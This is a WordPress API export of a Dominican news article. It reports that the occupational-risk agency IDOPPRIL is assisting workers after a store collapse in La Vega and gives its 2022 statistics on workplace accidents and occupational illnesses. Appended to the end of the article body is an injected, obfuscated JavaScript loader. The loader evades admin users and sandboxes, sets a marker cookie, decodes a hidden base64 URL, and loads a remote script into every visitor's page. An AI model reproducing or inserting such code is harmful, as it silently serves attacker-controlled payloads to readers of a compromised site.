{"id":13459,"date":"2023-01-19T08:42:51","date_gmt":"2023-01-19T12:42:51","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13459"},"modified":"2023-01-19T08:42:51","modified_gmt":"2023-01-19T12:42:51","slug":"idoppril-asistira-trabajadores-afectados-por-colapso-del-edificio-en-la-vega","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13459","title":{"rendered":"IDOPPRIL asistir\u00e1 trabajadores afectados por colapso del edificio en La Vega"},"content":{"rendered":"<p>anto Domingo.- El Instituto Dominicano de Prevenci\u00f3n y Protecci\u00f3n de Riesgos Laborales\u00a0<strong>(IDOPPRIL), a trav\u00e9s de su director ejecutivo, Fausto L\u00f3pez Sol\u00eds,<\/strong>\u00a0se solidariz\u00f3 con los\u00a0<strong>empleados, familiares, propietarios\u00a0<\/strong>de la tienda que colaps\u00f3 en La Vega e instruy\u00f3 a la Direcci\u00f3n Regional Norte para asistir a\u00a0<strong>los trabajadores afectados.<\/strong><\/p>\n<p><strong>Manuel Est\u00e9vez, titular de dicha Regional,\u00a0<\/strong>acompa\u00f1ado de la\u00a0<strong>doctora<\/strong>\u00a0<strong>Dianeris Pichardo, encargada en La Vega del IDOPPRIL<\/strong>, se presentaron al lugar de los hechos, donde realizaron el levantamiento y\u00a0<strong>de<\/strong>\u00a0<strong>inmediato se pusieron en comunicaci\u00f3n con el ejecutivo para atender los casos.<\/strong><\/p>\n<p>Por otro lado, el IDOPPRIL detall\u00f3 que durante el 2022 fueron recibidos\u00a0<strong>44,779 reportes correspondientes a accidentes de trabajo (AT) y 4,822 a enfermedades profesionales (EP).<\/strong><\/p>\n<p>De estos casos notificados, un total de 21,895 pertenece a trabajadores del Distrito Nacional, 15,944 a la regi\u00f3n Norte, 8,606 a las provincias del Este y 3,150 se produjeron en la regi\u00f3n Sur del pa\u00eds.<\/p>\n<p>El funcionario especific\u00f3 que\u00a0<strong>37,448 de los accidentes laborales reportados<\/strong>\u00a0del 1 de enero al 31 de diciembre del a\u00f1o 2022 correspondieron al\u00a0<strong>sector privado<\/strong>; mientras que entre los\u00a0<strong>empleados p\u00fablicos<\/strong>\u00a0se registraron<strong>\u00a012,147 casos<\/strong>.<\/p>\n<p><em>\u201cEl mayor n\u00famero de reportes de trabajadores que sufrieron accidentes de trabajo (AT) o enfermedades profesionales (EP) recay\u00f3 en el g\u00e9nero masculino con 30,044 casos, mientras que los restantes 19,551 correspondieron al g\u00e9nero femenino\u201d,<\/em>\u00a0explic\u00f3 L\u00f3pez Sol\u00eds.<\/p>\n<p>Sostuvo que los trabajadores con edades que oscilan entre los 20 a 29 a\u00f1os, generaron 16,256 reportes de accidentes laborales; los de 30 a 39 produjeron 15,489; los de 40 a 49 a\u00f1os fueron 9,689; los mayores de 60 a\u00f1os 2,319, mientras que la menor cifra de reportes correspondi\u00f3 a empleados con menos de 20 a\u00f1os de edad, con 163 casos notificados, durante el a\u00f1o 2022.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>anto Domingo.- El Instituto Dominicano de Prevenci\u00f3n y Protecci\u00f3n de Riesgos Laborales\u00a0(IDOPPRIL), a trav\u00e9s de su director ejecutivo, Fausto L\u00f3pez Sol\u00eds,\u00a0se solidariz\u00f3 con los\u00a0empleados, familiares, propietarios\u00a0de la tienda que colaps\u00f3 en La Vega e instruy\u00f3 a la Direcci\u00f3n Regional Norte para asistir a\u00a0los trabajadores afectados. Manuel Est\u00e9vez, titular de dicha Regional,\u00a0acompa\u00f1ado de la\u00a0doctora\u00a0Dianeris Pichardo, encargada [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13461,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13459","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13459","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13459"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13459\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13461"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13459"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13459"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13459"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}